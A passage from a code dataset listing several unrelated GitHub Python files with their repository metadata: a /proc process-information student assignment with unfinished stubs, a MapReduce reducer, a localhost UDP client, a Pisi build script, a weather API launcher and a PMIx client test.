res = max(res, i - k)
return res
if __name__ == '__main__':
s = "abcabcbb"
sol = Solution1()
w = sol.length0fLongestSubstring(s)
print("The answer is :", w)
| [
"noreply@github.com"
] | ZhouZoey.noreply@github.com |
54c78328c2d9d8feae7f8934077198c8ac87f736 | 4036ed3d566c74db3c9cfce6d292b903ffdfa6af | /MachineProblem3/protest.py | de02c10333cc82aa114ccee56e6eea7e6b5d2b7a | [] | no_license | HighKingOfGondor/CSCE-313 | 189a04709b2aec5e9333caf8adee93535d6e048f | 84961d619ae8e5a96904f207960e8310b1d274d2 | refs/heads/master | 2021-01-19T04:10:52.874147 | 2017-05-30T16:03:28 | 2017-05-30T16:03:28 | 87,355,434 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,375 | py | import sys
import re
import os
from subprocess import check_output, CalledProcessError
class Proctest(object):
"""
Object to contain process data and getter functions
"""
def __init__(self, pid):
fileStatus = "/proc/" + pid + "/status"
fileStat = "/proc/" + pid + "/stat"
fileStatus1 = fileStatus.strip("\n")
fileStat1 = fileStat.strip("\n")
self.processID = pid
self.status = []
self.uids = []
self.guids = []
with open (fileStatus1, 'r') as f:
self.status = f.read().splitlines()
for line in self.status:
match = re.search(r'\bPpid:\b', line)
if match:
self.ppid = line[line.index(match) + 1]
match = re.search(r'\bUid:\b', line)
if match:
self.uids = line.split()
for line in self.status:
match = re.search(r'\bGid:\b', line)
if match:
self.guids = line.split()
match = re.search(r'\bState:\b', line)
if match:
self.state = line[line.index(match) + 1]
match = re.search(r'\bTgid:\b', line)
if match:
self.tid = line[line.index(match) + 1]
match = re.search(r'\bThreads:\b', line)
if match:
self.threadNum = line[line.index(match) + 1]
self.stat = []
with open (fileStat1, 'r') as f1:
self.stat = f1.read().split()
def getpid(self):
localpid = self.processID
return localpid
def getppid(self):
localppid = self.ppid
return localppid
def geteuid(self):
euid = self.uids[2]
return euid
def getegid(self):
geiud = self.guids[2]
return geiud
def getruid(self):
ruid = self.uids[1]
return ruid
def getrgid(self):
rgid = self.guids[1]
return rgid
def getfsuid(self):
fsuid = self.uids[4]
return fsuid
def getfsgid(self):
fsgid = self.guids[4]
return fsgid
def getstate(self):
localstate = self.state
return localstate
def getthread_count(self):
thread_count = self.threadNum[1]
return thread_count
def getpriority(self):
priority = self.stat[17]
return priority
def getniceness(self):
nice = self.stat[18]
return nice
def getstime(self):
stime = self.stat[14]
return stime
def getutime(self):
utime = self.stat[13]
return utime
def getcstime(self):
cstime = self.stat[16]
return cstime
def getcutime(self):
cutime = self.stat[15]
return cutime
def getstartcode(self):
startTime = self.stat[21]
return startTime
def getendcode(self):
endCode = self.stat[26]
return endCode
def getesp(self):
esp = self.stat[28]
return esp
def geteip(self):
eip = self.stat[29]
return eip
def getfiles(self):
"""
Returns process's current number of open file descriptors
Work needed here!
"""
pass
def getvoluntary_context_switches(self):
"""
Returns the number of times that the process has voluntarily
yielded control to the kernel.
Work needed here!
"""
pass
def getnonvoluntary_context_switches(self):
"""
Returns the number of times that the process has had control
taken from it forcefully by the kernel.
Work needed here!
"""
pass
def getlast_cpu(self):
"""
Returns the last cpu that the process executed on
Work needed here!
"""
pass
def getallowed_cpus(self):
"""
Returns a list of allowed processors
Work needed here!
"""
pass
def getmemory_map(self):
"""
Returns process's memory map
Work needed here!
"""
pass
def main():
# Read in PID
sys.stdout.write("Enter the PID of a process: ")
sys.stdout.flush()
process_pid = sys.stdin.readline()
process_data = Proctest(process_pid)
# Start printing out values
print ""
print "Process Information:"
print " 1) Identifiers"
print " PID: %s" % process_data.getpid()
print " PPID: %s" % process_data.getppid()
print " EUID: %s" % process_data.geteuid()
print " EGID: %s" % process_data.getegid()
print " RUID: %s" % process_data.getruid()
print " RGID: %s" % process_data.getrgid()
print " FSUID: %s" % process_data.getfsuid()
print " FSGID: %s" % process_data.getfsgid()
print ""
print " 2) State"
print " State: %s" % process_data.getstate()
print ""
print " 3) Thread Information"
print " Thread Count: %s" % process_data.getthread_count()
print ""
print " 4) Priority"
print " Priority Number: %s" % process_data.getpriority()
print " Niceness Value: %s" % process_data.getniceness()
print ""
print " 5) Time Information"
print " stime: %s" % process_data.getstime()
print " utime: %s" % process_data.getutime()
print " cstime: %s" % process_data.getcstime()
print " cutime: %s" % process_data.getcutime()
print ""
print " 6) Address Space"
print " Startcode: %s" % process_data.getstartcode()
print " Endcode: %s" % process_data.getendcode()
print " ESP: %s" % process_data.getesp()
print " EIP: %s" % process_data.geteip()
print ""
print " 7) Resources"
print " File Handles: %s" % process_data.getfiles()
print " Voluntary Context Switches: %s" % process_data.getvoluntary_context_switches()
print " Nonvoluntary Context Switches: %s" % process_data.getnonvoluntary_context_switches()
print ""
print " 8) Processor"
print " Last Processor: %s" % process_data.getlast_cpu()
print " Allowed Cores: %s" % process_data.getallowed_cpus()
print ""
print " 9) Memory Map"
temp_mem_array = process_data.getmemory_map()
for line in temp_mem_array:
print " %s" % line
if __name__ == "__main__":
main()
| [
"noreply@github.com"
] | HighKingOfGondor.noreply@github.com |
f4a65671dde5f682aab0a747b66e2ba2cdc09f88 | c9d4d4c78703d009da11999e4e59b6a168a454a2 | /examples/Machine Learning In Action/reducer.py | 67e8edacbbd3347055d42c21781c0208b8451281 | [
"MIT"
] | permissive | AkiraKane/Python | 23df49d7f7ae0f375e0b4ccfe4e1b6a077b1a52b | 12e2dcb9a61e9ab0fc5706e4a902c48e6aeada30 | refs/heads/master | 2020-12-11T07:20:01.524438 | 2015-11-07T12:42:22 | 2015-11-07T12:42:22 | 47,440,128 | 1 | 0 | null | 2015-12-05T03:15:52 | 2015-12-05T03:15:51 | null | UTF-8 | Python | false | false | 1,139 | py | '''
-------------------------------------------------------------------------
Book: Machine Learning In Action
# Lesson: MapReduce - reducer
# Author: Kelly Chan
# Date: Feb 3 2014
-------------------------------------------------------------------------
'''
import sys
from numpy import mat, mean, power
def dataLoad(dataFile):
for line in dataFile:
yield line.rstrip()
# creating a list of lines from dataFile
data = dataLoad(sys.stdin)
# spliting data lines into separte items and storing in list of lists
mapperOut = [line.split('\t') for line in data]
# accumulating total number of samples, overall sum and overall sum squared
accumulateN = 0.0
accumulateSum = 0.0
accumulateSumSquared = 0.0
for instance in mapperOut:
thisN = float(instance[0])
accumulateN += thisN
accumulateSum += thisN * float(instance[1])
accumulateSumSquared += thisN * float(instance[2])
# calculating means
mean = accumulateSum / accumulateN
meanSq = accumulateSumSquared / accumulateN
# printing size, mean, mean squared
print "%d\t%f\t%f" % (accumulateN, mean, meanSq)
print >> sys.stderr, "report: still alive"
| [
"kwailamchan@hotmail.com"
] | kwailamchan@hotmail.com |
46cf562c95af191be94d761d7f80a726259bf3ef | cd84e26e1a03676751bea45339aff90d14671af4 | /c/net_lastsem/client1.py | 8005768ee0c48fa9722537361c0b7cd3d3ece74b | [] | no_license | Adityaypatil/my-codes | 947b8aa0a5b440f7ae3df4d4a5e426658117779c | 04f086c136e9e7f358b697ec52f8a3da1d750557 | refs/heads/master | 2021-01-01T03:54:53.886603 | 2016-04-29T11:01:07 | 2016-04-29T11:01:07 | 57,363,322 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 375 | py | import socket
import sys
sock=socket.socket(socket.AF_INET,socket.SOCK_DGRAM)
server_Add=("localhost",10001)
#data= 'Hello'
while(1):
data = raw_input('Enter any data :')
print 'sending data :%s' % data
sent=sock.sendto(data,server_Add)
print 'Waiting :'
data,server=sock.recvfrom(1024)
print 'Recieve data :%s' % data
print 'CLosing socket'
sock.close()
| [
"adityapatil961992@gmail.com"
] | adityapatil961992@gmail.com |
22eda2f6808270ecbce2716573ef6ba9a1323562 | 65748b3fdc3f9ebbf39625f7e62c377cd110e9ea | /TrafficCreator/ProtocolHandlers/UdpProtocol.py | 3c135833c4d9467b2b9a63573e0566aa6bbc2ffa | [] | no_license | Pflokki/GenUI | e64ace0e55c8fb2267274ae30f37965672348b38 | 576ce9e615897f0f9d630442aa477e7a4bd627da | refs/heads/master | 2022-11-04T22:15:30.820247 | 2020-06-19T21:45:10 | 2020-06-19T21:45:10 | 245,126,743 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 134 | py | from .DefaultProtocol import DefaultProtocol
class UDPProtocol(DefaultProtocol):
def __init__(self):
super().__init__()
| [
"ukostyan@gmail.com"
] | ukostyan@gmail.com |
e1bba0f09554acc3bb4b6d06ed2b7d9e1b2ef32b | 30f15a184450d6e914ac16375e674cc2f993b9ce | /desktop/enlightenment/addon/e-module-mail/actions.py | 592c34362879b146c20631acd1af05e28314ac96 | [] | no_license | Erick-Pardus/2013 | 9d0dd48e19400965476480a8e6826beb865bdb2e | 80943b26dbb4474f6e99f81752a0d963af565234 | refs/heads/master | 2021-01-18T16:57:58.233209 | 2012-10-30T20:35:42 | 2012-10-30T20:35:42 | 6,467,098 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 622 | py | #!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright 2011 TUBITAK/BILGEM
# Licensed under the GNU General Public License, version 2.
# See the file http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt
from pisi.actionsapi import autotools
from pisi.actionsapi import get
from pisi.actionsapi import pisitools
from pisi.actionsapi import shelltools
WorkDir="mail"
def setup():
autotools.autoreconf("-vfi")
shelltools.system("./autogen.sh --disable-static")
def build():
autotools.make()
def install():
autotools.rawInstall("DESTDIR=%s"% get.installDIR())
pisitools.dodoc("AUTHORS","COPYING*")
| [
"erdincgultekin@gmail.com"
] | erdincgultekin@gmail.com |
e0d4da74400b07b5d1b53842cf893c82025f4ed0 | c02589ad3c0a64258bd96b711e2a158321a85208 | /run.py | 9b3e4316da35000c73e0b7be98c6de21a26eed52 | [
"MIT"
] | permissive | aatrubilin/wpapi | f06b3252b3240c27755c826b41729ad0f8bc5c1f | 6832cbf113f55737752d7ddbc1f045b8f6116f61 | refs/heads/master | 2020-07-25T13:52:13.492281 | 2019-09-16T06:02:17 | 2019-09-16T06:02:17 | 208,312,455 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,027 | py | import os
import argparse
from wpapi.server import app
import wpapi.weather_services as services
parser = argparse.ArgumentParser()
parser.add_argument(
"-s",
"--service",
type=str,
required=True,
choices=["OpenWeatherMapAPI", "FakeWeatherAPI"],
help="Working weather api.",
)
parser.add_argument(
"-lat",
"--latitude",
type=float,
metavar="55.03",
default=55.03,
help="City geo location, latitude",
)
parser.add_argument(
"-lon",
"--longitude",
type=float,
metavar="82.92",
default=82.92,
help="City geo location, longitude",
)
parser.add_argument(
"-t",
"--timeout",
type=int,
metavar="10",
default=10,
help="Min seconds between requests to API. Default 10",
)
args = parser.parse_args()
token = os.environ.get("WEATHER_API_TOKEN", None)
api = getattr(services, args.service)(
lat=args.latitude, lon=args.longitude, token=token, timeout_sec=args.timeout
)
app.register_api(api, url_prefix=None)
app.run(host="0.0.0.0")
| [
"aatrubilin@gmail.com"
] | aatrubilin@gmail.com |
1c65963e4268e1a9119332b227a3df05764c3cb1 | cb52f3f0f0b51fec9dd27f6992b1c42ff02b43ab | /bindings/python/client.py | ae5445a18a181542d0649ea755a51739248c1c0e | [
"BSD-3-Clause-Open-MPI"
] | permissive | atongkuze/pmix | 7a8d82a6351402e1e146ff75031a2112b2b11534 | cd51ea4d28ec0d0e2de72ec5f6157a0684b0144d | refs/heads/master | 2020-05-02T19:54:26.413138 | 2019-03-28T00:01:16 | 2019-03-28T00:01:16 | 178,173,206 | 0 | 0 | NOASSERTION | 2019-03-28T09:45:11 | 2019-03-28T09:45:01 | C | UTF-8 | Python | false | false | 461 | py | #!/opt/local/bin/python
from pmix import *
def main():
foo = PMIxClient()
print("Testing PMIx ", foo.get_version())
info = {PMIX_PROGRAMMING_MODEL: 'TEST', PMIX_MODEL_LIBRARY_NAME: "PMIX"}
my_result = foo.init(info)
print("Init result ", my_result)
if 0 != my_result:
print("FAILED TO INIT")
exit(1)
# try getting something
# finalize
info = {}
foo.finalize(info)
if __name__ == '__main__':
main()
| [
"rhc@open-mpi.org"
] | rhc@open-mpi.org |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.